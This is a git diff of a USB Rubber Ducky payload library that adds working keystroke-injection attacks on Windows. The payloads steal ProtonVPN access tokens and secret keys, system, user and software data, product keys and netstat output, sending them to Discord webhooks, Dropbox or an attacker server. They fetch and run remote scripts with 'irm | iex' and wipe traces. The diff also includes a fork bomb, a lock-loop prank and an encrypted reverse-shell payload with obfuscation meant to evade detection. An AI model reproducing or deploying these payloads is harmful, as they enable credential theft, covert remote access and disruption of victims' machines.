REM # Category : Credentials, Exfiltration |
|
||||||
|
REM # Target : Windows 10-11 |
|
||||||
|
REM # |
|
||||||
|
REM ###################################################################
|
||||||
|
|
||||||
|
REM Title: ProtonVPN-config-to-Discord-Exfiltration
|
||||||
|
REM Author: Aleff
|
||||||
|
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
|
REM In the config file you can find a lot information about the user like:
|
||||||
|
REM - UserUid
|
||||||
|
REM - UserAccessToken
|
||||||
|
REM - UserRefreshToken
|
||||||
|
REM - UserAuthenticationPublicKey
|
||||||
|
REM - UserAuthenticationSecretKey
|
||||||
|
REM - UserAuthenticationCertificatePem
|
||||||
|
REM - UserCertificationServerPublicKey
|
||||||
|
REM - and so on...
|
||||||
|
REM Then it cleans up traces of what you have done after.
|
||||||
|
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Credentials, Exfiltration
|
||||||
|
REM Requirements: ProtonVPN user logged at least one time and internet connection
|
||||||
|
REM
|
||||||
|
|
||||||
|
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
DEFINE WEBHOOK example.com
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
DELETE
|
||||||
|
STRING powershell -w h -ep bypass $discord='
|
||||||
|
STRING WEBHOOK
|
||||||
|
|
||||||
|
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
||||||
|
DEFINE PAYLOAD example.com
|
||||||
|
STRING ';irm PAYLOAD | iex
|
||||||
|
ENTER
|
|
@ -6,7 +6,7 @@
|
||||||
|
|
||||||
## Description
|
## Description
|
||||||
|
|
||||||
This payload exfiltrates Windows system information and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
|
||||||
|
|
||||||
## Usage
|
## Usage
|
||||||
|
|
||||||
|
@ -34,9 +34,9 @@ This payload exfiltrates Windows system information and installed programs from
|
||||||
|
|
||||||
- **Prepare your payload**
|
- **Prepare your payload**
|
||||||
|
|
||||||
- Download the Powershell script ".ps1".
|
- Download the Powershell script "script.ps1".
|
||||||
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
|
||||||
- Upload your modified ".ps1" file to Dropbox and copy the upload link.
|
- Upload your modified "script.ps1" file to Dropbox and copy the upload link.
|
||||||
- Replace the end of the link from "?dl=0" to "?dl=1"
|
- Replace the end of the link from "?dl=0" to "?dl=1"
|
||||||
*This is your "<DOWNLOAD_LINK>".*
|
*This is your "<DOWNLOAD_LINK>".*
|
||||||
- Download the "payload.txt" file.
|
- Download the "payload.txt" file.
|
||||||
|
@ -44,9 +44,13 @@ This payload exfiltrates Windows system information and installed programs from
|
||||||
|
|
||||||
### Analysis
|
### Analysis
|
||||||
|
|
||||||
Once you have your report file, you can easily extract the information from the system and scan it for vulnerabilities. You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to check for missing patches that may result in a vulnerability that you could use to elevate your privileges on the target system.
|
Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
|
||||||
|
|
||||||
The software installed on the target system may also present various opportunities for elevation of privileges. That's why the report also contains the name and version of each software installed on the target computer, allowing you to search for existing exploits on each installed software, through sites like [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
|
You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
|
||||||
|
|
||||||
|
You can check if the user has dangerous permissions that can be exploited.
|
||||||
|
|
||||||
|
The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
|
|
@ -12,6 +12,6 @@ GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
|
||||||
STRING DOWNLOAD_LINK
|
STRING DOWNLOAD_LINK
|
||||||
STRING ; invoke-expression $pl
|
STRING ; iex $pl
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -3,4 +3,4 @@
|
||||||
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
|
||||||
|
|
||||||
|
|
||||||
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
|
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
|
|
@ -36,7 +36,11 @@ $headers = @{
|
||||||
|
|
||||||
#Define the report for the file upload
|
#Define the report for the file upload
|
||||||
|
|
||||||
$body = "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
|
||||||
|
|
||||||
|
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
|
||||||
|
|
||||||
|
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
|
||||||
|
|
||||||
#Upload the report to Dropbox using the headers and body defined above
|
#Upload the report to Dropbox using the headers and body defined above
|
||||||
|
|
||||||
|
|
|
@ -16,10 +16,10 @@ This payload exfiltrate the target's Windows product key to a remote server. *On
|
||||||
```
|
```
|
||||||
python -m http.server 80
|
python -m http.server 80
|
||||||
```
|
```
|
||||||
- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server.
|
- Download the "payload.txt" and "script.ps1" files and modify them to include the IP address of your server.
|
||||||
- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address:
|
- Move the modified "script.ps1" file to the root directory of your website, so it is downloadable from this address:
|
||||||
```
|
```
|
||||||
http://<REMOTE_IP_ADDRESS>/.ps1
|
http://<REMOTE_IP_ADDRESS>/script.ps1
|
||||||
```
|
```
|
||||||
|
|
||||||
### Analysis
|
### Analysis
|
||||||
|
|
|
@ -12,6 +12,6 @@ GUI r
|
||||||
DELAY 500
|
DELAY 500
|
||||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://
|
||||||
STRING REMOTE_IP_ADDRESS
|
STRING REMOTE_IP_ADDRESS
|
||||||
STRING /.ps1; invoke-expression $pl
|
STRING /.ps1; iex $pl
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
ENTER
|
||||||
|
|
|
@ -0,0 +1,41 @@
|
||||||
|
# Windows netstat ✅
|
||||||
|
|
||||||
|
A script used to stole target netstat status.
|
||||||
|
|
||||||
|
**Category**: Net, Exfiltration
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This script will stole target netstat status.
|
||||||
|
|
||||||
|
Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
|
|
||||||
|
Then it cleans up traces of what you have done after.
|
||||||
|
|
||||||
|
## Getting Started
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
* An internet connection
|
||||||
|
* Windows 10,11
|
||||||
|
|
||||||
|
### Executing program
|
||||||
|
|
||||||
|
* Plug in your device
|
||||||
|
* Invoke the indicated commands
|
||||||
|
* Invoke-WebRequest will be entered in the Run Box to send the content
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
Put 1 on the function that you want to active, else 0.
|
||||||
|
Functions available:
|
||||||
|
- default (*or simple 'netstat' command*)
|
||||||
|
- routing_table **$r**
|
||||||
|
- listening_canonical **$lc**
|
||||||
|
- listening_numerical **$ln**
|
||||||
|
- all_canonical **$ac**
|
||||||
|
- all_numerical **$an**
|
||||||
|
- offload **ot**
|
||||||
|
- proto **$p "\<protocol>"**
|
||||||
|
- *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,79 @@
|
||||||
|
|
||||||
|
# Discord send function
|
||||||
|
function exfiltration () {
|
||||||
|
param(
|
||||||
|
[Parameter (Mandatory = $true, Position=0)] [String]$command,
|
||||||
|
[Parameter (Mandatory = $true, Position=1)] [String]$text
|
||||||
|
)
|
||||||
|
# Loop for Discord
|
||||||
|
$ConstantLimitForRestMethod = 1999
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $command
|
||||||
|
'content' = ""
|
||||||
|
}
|
||||||
|
for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
|
||||||
|
try {
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $command
|
||||||
|
'content' = $text.Substring($i, $ConstantLimitForRestMethod)
|
||||||
|
}
|
||||||
|
} catch [ArgumentOutOfRangeException] {
|
||||||
|
if($text.Length-$i -gt 0){
|
||||||
|
$TMP_Body = @{
|
||||||
|
'username' = $command
|
||||||
|
'content' = $text.Substring($i, $text.Length-$i)
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
# send command format
|
||||||
|
function send_command(){
|
||||||
|
param(
|
||||||
|
[Parameter (Mandatory = $true, Position=0)] [String]$cmd
|
||||||
|
)
|
||||||
|
$out = Invoke-Expression $cmd
|
||||||
|
(exfiltration $cmd [string]$out)
|
||||||
|
}
|
||||||
|
|
||||||
|
# Settings
|
||||||
|
if ( $d -eq "1") {
|
||||||
|
$cmd = "netstat"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $r -eq "1") {
|
||||||
|
$cmd = "netstat -r"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $lc -eq "1") {
|
||||||
|
$cmd = "netstat -af"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $ln -eq "1") {
|
||||||
|
$cmd = "netstat -an"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $ac -eq "1") {
|
||||||
|
$cmd = "netstat -qf"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $an -eq "1") {
|
||||||
|
$cmd = "netstat -qn"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $o -eq "1") {
|
||||||
|
$cmd = "netstat -t"
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
if ( $p -ne "" ) {
|
||||||
|
# format $proto="TCP"
|
||||||
|
$cmd = "netstat -ps " + $p
|
||||||
|
(send_command $cmd)
|
||||||
|
}
|
||||||
|
|
||||||
|
# Clear the PowerShell command history
|
||||||
|
Clear-History
|
|
@ -0,0 +1,45 @@
|
||||||
|
REM ###################################################################
|
||||||
|
REM # |
|
||||||
|
REM # Title : Windows-netstat-to-Discord-Exfiltration |
|
||||||
|
REM # Author : Aleff |
|
||||||
|
REM # Version : 1.0 |
|
||||||
|
REM # Category : Net, Exfiltration |
|
||||||
|
REM # Target : Windows 10-11 |
|
||||||
|
REM # |
|
||||||
|
REM ###################################################################
|
||||||
|
|
||||||
|
REM Title: Windows-netstat-to-Discord-Exfiltration
|
||||||
|
REM Author: Aleff
|
||||||
|
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||||
|
REM Put 1 on the function that you want to active, else 0. Functions available:
|
||||||
|
REM - default (simple 'netstat' command)
|
||||||
|
REM - routing_table $r
|
||||||
|
REM - listening_canonical $lc
|
||||||
|
REM - listening_numerical $ln
|
||||||
|
REM - all_canonical $ac
|
||||||
|
REM - all_numerical $an
|
||||||
|
REM - offload ot
|
||||||
|
REM - proto $p "<protocol>"
|
||||||
|
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
||||||
|
|
||||||
|
REM Target: Windows 10-11 (PowerShell)
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Net, Exfiltration
|
||||||
|
REM Requirements: Internet connection
|
||||||
|
REM
|
||||||
|
|
||||||
|
REM REQUIRED - Provide your Discord WEBHOOK
|
||||||
|
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||||
|
|
||||||
|
DELAY 2000
|
||||||
|
GUI r
|
||||||
|
DELAY 250
|
||||||
|
DELETE
|
||||||
|
STRING powershell -w h -ep bypass $discord='
|
||||||
|
|
||||||
|
STRING WEBHOOK
|
||||||
|
|
||||||
|
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
||||||
|
DEFINE PAYLOAD example.com
|
||||||
|
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
|
||||||
|
ENTER
|
|
@ -0,0 +1,61 @@
|
||||||
|
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
REM # TITLE: Whatsapp Message Sender
|
||||||
|
REM #
|
||||||
|
REM # AUTHOR: Gopalsamy Rajendran LinkedIn: @gopalsamyrajendran Version:1.0
|
||||||
|
REM #
|
||||||
|
REM # Disclaimer: This script is only for Educational purpose. Please don't misuse it.
|
||||||
|
REM #
|
||||||
|
REM # Tested OS: Android version 12
|
||||||
|
REM #
|
||||||
|
REM # Note: Script won't work on locked devices
|
||||||
|
REM #
|
||||||
|
REM # Date: 08/03/2023
|
||||||
|
REM # -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||||
|
|
||||||
|
DEFINE PHONENUMBER +91XXXXXXXXXX
|
||||||
|
DEFINE MESSAGE Hi this is Gopalsamy Rajendran
|
||||||
|
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
REM # Below lines will open search engine and type https://
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 100
|
||||||
|
STRING h
|
||||||
|
DELAY 100
|
||||||
|
STRING t
|
||||||
|
DELAY 100
|
||||||
|
STRING t
|
||||||
|
DELAY 100
|
||||||
|
STRING p
|
||||||
|
DELAY 100
|
||||||
|
STRING s
|
||||||
|
DELAY 500
|
||||||
|
DELAY 100
|
||||||
|
STRING :
|
||||||
|
DELAY 100
|
||||||
|
STRING /
|
||||||
|
DELAY 100
|
||||||
|
STRING /
|
||||||
|
DELAY 100
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
REM # Below lines will enter wa.me after https://
|
||||||
|
REM # Replace the mobile number with your's
|
||||||
|
|
||||||
|
STRING wa.me/
|
||||||
|
STRING PHONENUMBER
|
||||||
|
ENTER
|
||||||
|
DELAY 5000
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
REM # Below message will be sent to the target number confiugured above
|
||||||
|
REM # Replace the message with your own message
|
||||||
|
STRING MESSAGE
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
REM #-------------------------------------------------
|
||||||
|
|
|
@ -0,0 +1,54 @@
|
||||||
|
REM EternalLock
|
||||||
|
REM Version 1.0
|
||||||
|
REM OS: Windows / Unix
|
||||||
|
REM Author: 0iphor13
|
||||||
|
REM Requirement: DuckyScript 3.0
|
||||||
|
REM A lil' prank for all the ones snooping on your usb sticks. This will lock the machine every 100ms until the button is pressed (or ther ducky pulled out)
|
||||||
|
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
|
||||||
|
REM Extension DETECT_READY by Korben for best and fastest deployment
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.0
|
||||||
|
|
||||||
|
REM USAGE:
|
||||||
|
REM Extension runs inline (here)
|
||||||
|
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
REM boot delay
|
||||||
|
|
||||||
|
REM TARGETS:
|
||||||
|
REM Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE RESPONSE_DELAY 25
|
||||||
|
DEFINE ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Delay until the machine gets locked
|
||||||
|
DEFINE #TRIPWIRETIME 3000
|
||||||
|
REM Time between forced machine locks
|
||||||
|
DEFINE #LOCKTIME 100
|
||||||
|
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
DELAY #TRIPWIRETIME
|
||||||
|
|
||||||
|
BUTTON_DEF
|
||||||
|
WHILE TRUE
|
||||||
|
ATTACKMODE STORAGE
|
||||||
|
END_WHILE
|
||||||
|
END_BUTTON
|
||||||
|
|
||||||
|
REM Lock machine until Button is pressed
|
||||||
|
WHILE TRUE
|
||||||
|
GUI l
|
||||||
|
DELAY #LOCKTIME
|
||||||
|
END_WHILE
|
|
@ -0,0 +1,14 @@
|
||||||
|
REM HTML Fork Bomb by Jonny Banana
|
||||||
|
REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
|
||||||
|
DELAY 2000
|
||||||
|
CONTROL ESCAPE
|
||||||
|
DELAY 200
|
||||||
|
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
REM set a long delay to give time to this disgusting browser
|
||||||
|
DELAY 1000
|
||||||
|
REM it's time to enable Pop-Up
|
||||||
|
TAB
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
|
@ -3,11 +3,11 @@ REM https://github.com/JonnyBanana/Rubber-Ducky_HTML_Fork-Bomb
|
||||||
DELAY 2000
|
DELAY 2000
|
||||||
CONTROL ESCAPE
|
CONTROL ESCAPE
|
||||||
DELAY 200
|
DELAY 200
|
||||||
STRING C:\Program Files\Internet Explorer\iexplore.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
|
STRING C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe https://jonnybanana.github.io/HTML-Fork-Bomb.github.io/
|
||||||
DELAY 200
|
DELAY 200
|
||||||
ENTER
|
ENTER
|
||||||
REM set a long delay to give time to this disgusting browser
|
REM set a long delay to give time to this disgusting browser
|
||||||
DELAY 1000
|
DELAY 2000
|
||||||
REM it's time to enable Pop-Up
|
REM it's time to enable Pop-Up
|
||||||
TAB
|
TAB
|
||||||
DELAY 200
|
DELAY 200
|
||||||
|
|
|
@ -0,0 +1,56 @@
|
||||||
|
# Title: ReverseDuckyUltimate
|
||||||
|
|
||||||
|
<p>Author: 0iphor13<br>
|
||||||
|
OS: Windows<br>
|
||||||
|
Version: 1.0<br>
|
||||||
|
Requirements: DuckyScript 3.0, PayloadStudio v. 1.3.0 minimum</p>
|
||||||
|
|
||||||
|
**What is ReverseDuckyUlitmate?**
|
||||||
|
#
|
||||||
|
*ReverseDuckyUltimate (RDU) takes the best of every ReverseDucky payload. Customization, encryption, indentifiers, multi-layer polymorphism and automatic setup!*
|
||||||
|
*RDU is the ulitmate experience when it comes to remote access via your Rubber Ducky and it's so easy to use!*
|
||||||
|
#
|
||||||
|
## Instruction
|
||||||
|
|
||||||
|
Using ReverseDuckyUltimate is easy and straight forward, for instructions for automatic setup, click [here](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/README.md#instruction---automatic-setup).
|
||||||
|
- First: Create key.pem & cert.pem like so: <br>
|
||||||
|
```
|
||||||
|
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
|
||||||
|
```
|
||||||
|
It will ask for information about the certificate - Insert whatever you want.<br>
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/cert.png)
|
||||||
|
|
||||||
|
- Second: Start a listener on your attacking machine which supports certificates.
|
||||||
|
Examples:
|
||||||
|
```
|
||||||
|
openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]
|
||||||
|
ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem
|
||||||
|
```
|
||||||
|
- Third: Define the IP-Address and Port of your listening machine within the payload. Additionally add an unique identifier to give your Duck a name.
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/config.png)
|
||||||
|
|
||||||
|
- Fourth: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky and you are good to go.
|
||||||
|
|
||||||
|
## Instruction - Automatic Setup
|
||||||
|
- First: Navigate to `#SETUP` and set its value to `TRUE` and set your desired `#PORT` to the port you want to use.
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/setup.png)
|
||||||
|
|
||||||
|
- Second: Compile the payload, using PayloadStudio in version 1.3.0 minimum, transfer it onto your Ducky. Open up an elevated terminal on your attacking machine and instert the Ducky.
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/execsetup.png)
|
||||||
|
|
||||||
|
- Third: After the automatic setup, a listener should be running on your machine. Now re-enter PayloadStudio, set `#SETUP` to `FALSE`, define your IP-Address, compile the payload and you're good to go!
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/autoip.png)
|
||||||
|
#
|
||||||
|
|
||||||
|
![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/ReverseDuckyUltimate/media/pwn.png)
|
||||||
|
|
||||||
|
Credit for DS 3.0 implentation and ideas:
|
||||||
|
- Daniel Bohannon
|
||||||
|
- Grzegorz Tworek
|
||||||
|
- Korben
|
||||||
|
- Nikhil Mittal
|
Binary file not shown.
After Width: | Height: | Size: 66 KiB |
Binary file not shown.
After Width: | Height: | Size: 499 KiB |
Binary file not shown.
After Width: | Height: | Size: 49 KiB |
Binary file not shown.
After Width: | Height: | Size: 541 KiB |
Binary file not shown.
After Width: | Height: | Size: 610 KiB |
Binary file not shown.
After Width: | Height: | Size: 69 KiB |
|
@ -0,0 +1,357 @@
|
||||||
|
REM ReverseDuckyUltimate
|
||||||
|
REM Version 1.1
|
||||||
|
REM OS: Windows / Unix
|
||||||
|
REM Author: 0iphor13
|
||||||
|
REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum
|
||||||
|
REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.
|
||||||
|
|
||||||
|
REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails
|
||||||
|
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell
|
||||||
|
EXTENSION Rolling_Powershell_Execution
|
||||||
|
REM VERSION 1.0
|
||||||
|
REM Author: 0iphor13
|
||||||
|
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
|
||||||
|
REM Requirements: PayloadStudio v.1.3 minimum
|
||||||
|
REM Starts Powershell in uncommon ways to avoid basic detection
|
||||||
|
REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
REM Add ExecutionPolicy bypass
|
||||||
|
DEFINE #EXECUTIONPOLICY FALSE
|
||||||
|
DEFINE #DELAY 200
|
||||||
|
|
||||||
|
$_RANDOM_MIN = 1
|
||||||
|
$_RANDOM_MAX = 16
|
||||||
|
VAR $RANDOM_PS = $_RANDOM_INT
|
||||||
|
FUNCTION Rolling_Powershell_Execution()
|
||||||
|
IF ($RANDOM_PS == 1) THEN
|
||||||
|
STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"
|
||||||
|
ELSE IF ($RANDOM_PS == 2) THEN
|
||||||
|
STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"
|
||||||
|
ELSE IF ($RANDOM_PS == 3) THEN
|
||||||
|
STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"
|
||||||
|
ELSE IF ($RANDOM_PS == 4) THEN
|
||||||
|
STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"
|
||||||
|
